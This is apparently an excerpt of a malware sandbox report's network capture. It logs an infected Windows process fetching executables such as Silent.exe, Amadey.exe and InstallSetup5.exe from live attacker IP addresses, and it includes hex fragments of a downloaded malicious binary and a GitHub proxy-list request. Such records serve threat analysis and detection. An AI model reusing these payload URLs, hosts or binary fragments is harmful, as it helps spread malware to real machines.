                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2240192.168.2.555627107.167.110.2118044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.628834009 CET111OUTGET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
                                                                                                                                                                                                                                                            Host: net.geo.opera.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.856308937 CET424INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 162
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2241192.168.2.55562915.204.49.1488044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.649651051 CET55OUTGET /files/Silent.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.852037907 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:58 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 35 2e 32 30 34 2e 34 39 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2242192.168.2.555634107.167.110.2118044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.536478996 CET111OUTGET /opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767 HTTP/1.1
                                                                                                                                                                                                                                                            Host: net.geo.opera.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.768817902 CET424INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:00 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 162
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Location: https://net.geo.opera.com/opera/stable/windows/?utm_medium=apb&utm_source=mkt&utm_campaign=767
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2243192.168.2.55563515.204.49.1488044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.791949987 CET55OUTGET /files/Amadey.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.021440983 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 35 2e 32 30 34 2e 34 39 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2244192.168.2.555642185.172.128.1268044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.661124945 CET58OUTGET /InstallSetup5.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.172.128.126
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.969909906 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:03 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:02 GMT
                                                                                                                                                                                                                                                            ETag: "1ca8e4-6135951a2b6e0"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 1878244
                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 93 15 20 57 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 1a 00 8c 00 00 00 98 00 00 00 ae 01 00 75 43 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 a5 ea 01 00 02 00 00 80 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 7c 12 00 00 00 70 03 00 e8 15 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 8b 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 30 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 a0 00 00 00 02 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 6a 00 00 00 b0 00 00 00 6c 00 00 00 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 00 ad 01 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 7c 12 00 00 00 d0 02 00 00 14 00 00 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 04 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 73 72 63 00 00 00 e8 15 02 00 00 70 03 00 00 16 02 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 57 56 53 81 ec
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL WuC@ |p.text$ 0`.data@`.rdata8jl@`@.bss `.idata|@0.ndata@`.rsrcp@0UWVS
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:04.323045015 CET1286INData Raw: 9c 00 00 00 8b 55 0c 8b 45 14 83 fa 0f 74 1b 83 fa 46 0f 85 d4 01 00 00 8b 0d a4 bc 42 00 83 48 18 10 89 48 04 e9 c2 01 00 00 8d 45 a8 8b 35 20 bc 42 00 89 44 24 04 8b 45 08 89 04 24 ff 15 a0 d4 42 00 53 53 89 c3 8d 45 98 c7 45 8c 00 00 00 00 89
                                                                                                                                                                                                                                                            Data Ascii: UEtFBHHE5 BD$E$BSSEED$E$BEWWEE}9}E)EFTFPE}FTFPE}FTFPE}EM$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:04.323354006 CET1286INData Raw: ff 74 14 89 04 24 ff 15 1c d3 42 00 50 b8 01 00 00 00 e9 81 00 00 00 c7 44 24 08 00 00 00 00 89 7c 24 04 89 04 24 e8 49 ff ff ff 83 ec 0c 85 c0 74 9b 8b 85 dc fe ff ff 89 04 24 ff 15 1c d3 42 00 51 c7 04 24 04 00 00 00 e8 3d 6d 00 00 85 c0 57 74
                                                                                                                                                                                                                                                            Data Ascii: t$BPD$|$$It$BQ$=mWt BD$t$$T$%=But$$$BRRe[^_]US4]B$"4R<(ARuBM\$$D$D$L$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:05.043148041 CET1286INData Raw: 89 44 24 08 ff 15 d0 d3 42 00 83 ec 10 85 c0 74 37 8b 85 a8 fe ff ff 31 ff 39 c3 73 3d 80 38 00 74 38 89 1c 24 e8 e5 66 00 00 85 c0 52 74 19 83 c0 2c 89 44 24 04 8b 85 a8 fe ff ff 89 04 24 e8 5e 62 00 00 50 50 eb 12 8b 85 6c fe ff ff bf 01 00 00
                                                                                                                                                                                                                                                            Data Ascii: D$Bt719s=8t8$fRt,D$$^bPPlBtD$D$$B$VW1T$\$D$D$D$$,B$QD$$_RR'
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:06.131136894 CET1286INData Raw: 9c 00 00 00 8b 55 0c 8b 45 14 83 fa 0f 74 1b 83 fa 46 0f 85 d4 01 00 00 8b 0d a4 bc 42 00 83 48 18 10 89 48 04 e9 c2 01 00 00 8d 45 a8 8b 35 20 bc 42 00 89 44 24 04 8b 45 08 89 04 24 ff 15 a0 d4 42 00 53 53 89 c3 8d 45 98 c7 45 8c 00 00 00 00 89
                                                                                                                                                                                                                                                            Data Ascii: UEtFBHHE5 BD$E$BSSEED$E$BEWWEE}9}E)EFTFPE}FTFPE}FTFPE}EM$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:08.341860056 CET1286INData Raw: 9c 00 00 00 8b 55 0c 8b 45 14 83 fa 0f 74 1b 83 fa 46 0f 85 d4 01 00 00 8b 0d a4 bc 42 00 83 48 18 10 89 48 04 e9 c2 01 00 00 8d 45 a8 8b 35 20 bc 42 00 89 44 24 04 8b 45 08 89 04 24 ff 15 a0 d4 42 00 53 53 89 c3 8d 45 98 c7 45 8c 00 00 00 00 89
                                                                                                                                                                                                                                                            Data Ascii: UEtFBHHE5 BD$E$BSSEED$E$BEWWEE}9}E)EFTFPE}FTFPE}FTFPE}EM$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:12.691771984 CET1286INData Raw: 9c 00 00 00 8b 55 0c 8b 45 14 83 fa 0f 74 1b 83 fa 46 0f 85 d4 01 00 00 8b 0d a4 bc 42 00 83 48 18 10 89 48 04 e9 c2 01 00 00 8d 45 a8 8b 35 20 bc 42 00 89 44 24 04 8b 45 08 89 04 24 ff 15 a0 d4 42 00 53 53 89 c3 8d 45 98 c7 45 8c 00 00 00 00 89
                                                                                                                                                                                                                                                            Data Ascii: UEtFBHHE5 BD$E$BSSEED$E$BEWWEE}9}E)EFTFPE}FTFPE}FTFPE}EM$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:21.396356106 CET1286INData Raw: 9c 00 00 00 8b 55 0c 8b 45 14 83 fa 0f 74 1b 83 fa 46 0f 85 d4 01 00 00 8b 0d a4 bc 42 00 83 48 18 10 89 48 04 e9 c2 01 00 00 8d 45 a8 8b 35 20 bc 42 00 89 44 24 04 8b 45 08 89 04 24 ff 15 a0 d4 42 00 53 53 89 c3 8d 45 98 c7 45 8c 00 00 00 00 89
                                                                                                                                                                                                                                                            Data Ascii: UEtFBHHE5 BD$E$BSSEED$E$BEWWEE}9}E)EFTFPE}FTFPE}FTFPE}EM$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:39.315078974 CET1286INData Raw: 9c 00 00 00 8b 55 0c 8b 45 14 83 fa 0f 74 1b 83 fa 46 0f 85 d4 01 00 00 8b 0d a4 bc 42 00 83 48 18 10 89 48 04 e9 c2 01 00 00 8d 45 a8 8b 35 20 bc 42 00 89 44 24 04 8b 45 08 89 04 24 ff 15 a0 d4 42 00 53 53 89 c3 8d 45 98 c7 45 8c 00 00 00 00 89
                                                                                                                                                                                                                                                            Data Ascii: UEtFBHHE5 BD$E$BSSEED$E$BEWWEE}9}E)EFTFPE}FTFPE}FTFPE}EM$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:14.131149054 CET1286INData Raw: 9c 00 00 00 8b 55 0c 8b 45 14 83 fa 0f 74 1b 83 fa 46 0f 85 d4 01 00 00 8b 0d a4 bc 42 00 83 48 18 10 89 48 04 e9 c2 01 00 00 8d 45 a8 8b 35 20 bc 42 00 89 44 24 04 8b 45 08 89 04 24 ff 15 a0 d4 42 00 53 53 89 c3 8d 45 98 c7 45 8c 00 00 00 00 89
                                                                                                                                                                                                                                                            Data Ascii: UEtFBHHE5 BD$E$BSSEED$E$BEWWEE}9}E)EFTFPE}FTFPE}FTFPE}EM$
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:23.763113022 CET1286INData Raw: 9c 00 00 00 8b 55 0c 8b 45 14 83 fa 0f 74 1b 83 fa 46 0f 85 d4 01 00 00 8b 0d a4 bc 42 00 83 48 18 10 89 48 04 e9 c2 01 00 00 8d 45 a8 8b 35 20 bc 42 00 89 44 24 04 8b 45 08 89 04 24 ff 15 a0 d4 42 00 53 53 89 c3 8d 45 98 c7 45 8c 00 00 00 00 89
                                                                                                                                                                                                                                                            Data Ascii: UEtFBHHE5 BD$E$BSSEED$E$BEWWEE}9}E)EFTFPE}FTFPE}FTFPE}EM$


                                                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            0192.168.2.549708140.82.112.44433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:35 UTC101OUTGET /TheSpeedX/PROXY-List/blob/master/http.txt HTTP/1.1
                                                                                                                                                                                                                                                            Host: github.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:36 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: GitHub.com
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:35 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                                                            ETag: W/"0f276cf0553609c098b42ab0c59c3999"
                                                                                                                                                                                                                                                            Cache-Control: max-age=0, private, must-revalidate
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                            2024-03-11 02:30:36 UTC3593INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                                                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                                                                                                                                                                                                            2024-03-11 02:30:36 UTC21INData Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: connection: close
                                                                                                                                                                                                                                                            2024-03-11 02:30:36 UTC1370INData Raw: 32 32 45 43 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72
                                                                                                                                                                                                                                                            Data Ascii: 22EC<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
                                                                                                                                                                                                                                                            2024-03-11 02:30:36 UTC1370INData Raw: 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 61 66 61 39 39 64 63 66 34 30 66 37 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                                                                            Data Ascii: ="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-afa99dcf40f7.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/
                                                                                                                                                                                                                                                            2024-03-11 02:30:36 UTC1370INData Raw: 67 69 74 68 75 62 2d 66 34 64 38 35 37 63 62 63 39 36 61 2e 63 73 73 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 72 65 70 6f 73 69 74 6f 72 79 2d 36 32 34 37 63 61 32 33 38 66 64 34 2e 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                                                                                                                                                                                                                                            Data Ascii: github-f4d857cbc96a.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repository-6247ca238fd4.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubass
